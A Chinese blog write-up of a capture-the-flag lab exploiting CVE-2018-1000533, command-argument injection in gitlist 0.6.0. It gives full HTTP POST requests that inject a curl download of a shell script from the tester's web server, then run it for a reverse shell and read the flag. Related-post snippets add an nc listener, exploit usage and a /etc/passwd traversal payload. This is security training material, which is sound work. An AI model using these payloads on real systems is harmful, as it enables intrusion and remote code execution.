[春秋云镜]CVE-2018-1000533

已于 2022-12-03 21:20:21 修改
阅读量5.6k 收藏 3
点赞数
分类专栏: 春秋云镜 靶场 文章标签: 安全
于 2022-12-01 23:23:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niubi707/article/details/128140584
版权

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!

靶场介绍

gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞

春秋云镜开启靶场:
http://eci-2zebxdyfuuxflbl5ayaz.cloudeci1.ichunqiu.com/

先使用python起一个web服务

目录下写反弹shell的命令

 发送以下数据包

POST /example/tree/a/search HTTP/1.1
Host: eci-2zebxdyfuuxflbl5ayaz.cloudeci1.ichunqiu.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 86

query=--open-files-in-pager=curl http://127.0.0.1:8888/shell.txt -o /tmp/shell.sh;

服务器成功接收到

 反弹shell 数据包

POST /example/tree/a/search HTTP/1.1
Host: eci-2zebxdyfuuxflbl5ayaz.cloudeci1.ichunqiu.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 52

query=--open-files-in-pager=/bin/bash /tmp/shell.sh;

 服务器成功收到shell

读取flag  cat ../../../../../../flag

春天11-
关注
专栏目录
CVE-2018-2893:可以直接反弹shell
04-28
CVE-2018-2893 可以直接反弹shell Usage 监听 nc -lvvp reverse_port 发送payload python weblogic.py target_host target_port reverse_host reverse_port Reffer 说明 仅用于测试和交流学习,勿作他用
gitlist 0.6.0 远程命令执行漏洞(CVE-2018-1000533
EC_Carrot的博客
06-07 1119
漏洞原理 漏洞原理详细请看:https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 漏洞复现 发送以下数据包,即可执行命令: POST /example/tree/a/search HTTP/1.1 Host: your-ip:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64
春秋云镜CVE-2018-1000533
2301_78321656的博客
07-15 2037
gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞。可以用蚁剑连接一句话木马执行其他操作,这里要获取flag,所以直接执行命令获取flag。春秋云镜中的漏洞靶标,CVE编号为CVE-2018-1000533。根据cve并用burpsuite抓取数据包,并放到重放器中。修改数据包,写入一句话木马到网站目录中。访问漏洞环境,寻找可利用的点。
春秋云镜 CVE-2018-1000533
qq_22002773的博客
09-06 220
春秋云镜 CVE-2018-1000533
vulhub漏洞复现-Gitlist 0.6.0(cve-2018-1000533)远程命令执行漏洞
遇事不决冲冲冲
10-20 5331
Gitlist gitlist是一款使用PHP开发的图形化git仓库查看工具。 思路 在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令: public function searchTree($query, $branch) { if (empty($query)) { return null; } $query = escapeshellarg($query); try { $results = $this-&
vulhub漏洞复现二十_GitList
weixin_44193247的博客
01-30 1026
vulhub漏洞复现练习篇
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
gitlist:优雅而现代的git仓库查看器
02-04
GitList:优雅的git仓库查看器 GitList是一个优雅而现代的Web界面,用于与多个git存储库进行交互。 它使您可以使用自己喜欢的浏览器浏览存储库,查看不同修订版本下的文件,提交历史记录,差异。 它还为每个存储库生成RSS feed,使您可以随时随地保持最新变化。 GitList是用PHP编写的,位于微框架之上,并由Twig模板引擎提供支持。 这意味着GitList易于安装且易于定制。 另外,由于 ,GitList华丽的界面成为可能。 产品特点 多仓库支持 多分支支持 多标签支持 提交历史,怪,差异 RSS订阅 语法高亮 仓库统计 屏幕截图 要求 为了在服务器上运行GitList
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
phpipam开源IP地址管理系统Cookie XSS漏洞分析(CVE-2018-1000860)
afei001
02-20 729
phpipam开源IP地址管理系统Cookie XSS漏洞分析(CVE-2018-1000860)
使用 Metasploit 利用 OpenSSH 用户枚举漏洞 (CVE-2018-15473, CVE-2016-6210, CVE-1999-0502)
热门推荐
还没想好昵称的新建p的博客
02-22 1万+
本文大致讲述了如何使用 Metasploit 利用 OpenSSH 用户枚举漏洞。请务必遵守相关法律。(CC-BY-ND 4.0)
18年远程cve漏洞及利用对应exp
weixin_42373409的博客
09-14 873
CVE-2018-2628 Oracle Weblogic Server Deserialization RCE CVE-2018-2628 https://www.rapid7.com/db/modules/exploit/multi/misc/weblogic_deserialize CVE-2018-10933 libSSH Auth Bypass Exploit CVE-2018-10933 https://paper.seebug.org/720/https://github.com/.
谈escapeshellarg绕过与参数注入漏洞
dzqxwzoe的博客
02-12 246
参数注入漏洞是指,在执行命令的时候,用户控制了命令中的某个参数,并通过一些危险的参数功能,达成攻击的目的。我们从gitlist说起,gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞。在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令:php​其中,$query是搜索的关键字,$branch是搜索的分支。如果用户输入的$query的值是,将可以执行id命令:)](
cve-2018-3191简析
一个安全研究员
05-27 1881
如题
CVE-2018-9995漏洞复现
qq_39627497的博客
12-06 3051
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一...
CVE-2018-12613(远程文件包含)
weixin_59872639的博客
03-01 266
受影响版本 phpMyAdmin 4.8.0和4.8.1 环境 Vulhub - Docker-Compose file for vulnerability environment 漏洞利用 ?target=db_sql.php%253f/../../../../../../../../etc/passwd 因为`%253f`二次url解码后是`?`,整体变成 ?target=db_sql.php?/../../../../../../../../etc/passwd ...
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析,可以参考引用中提到的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋云境】CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值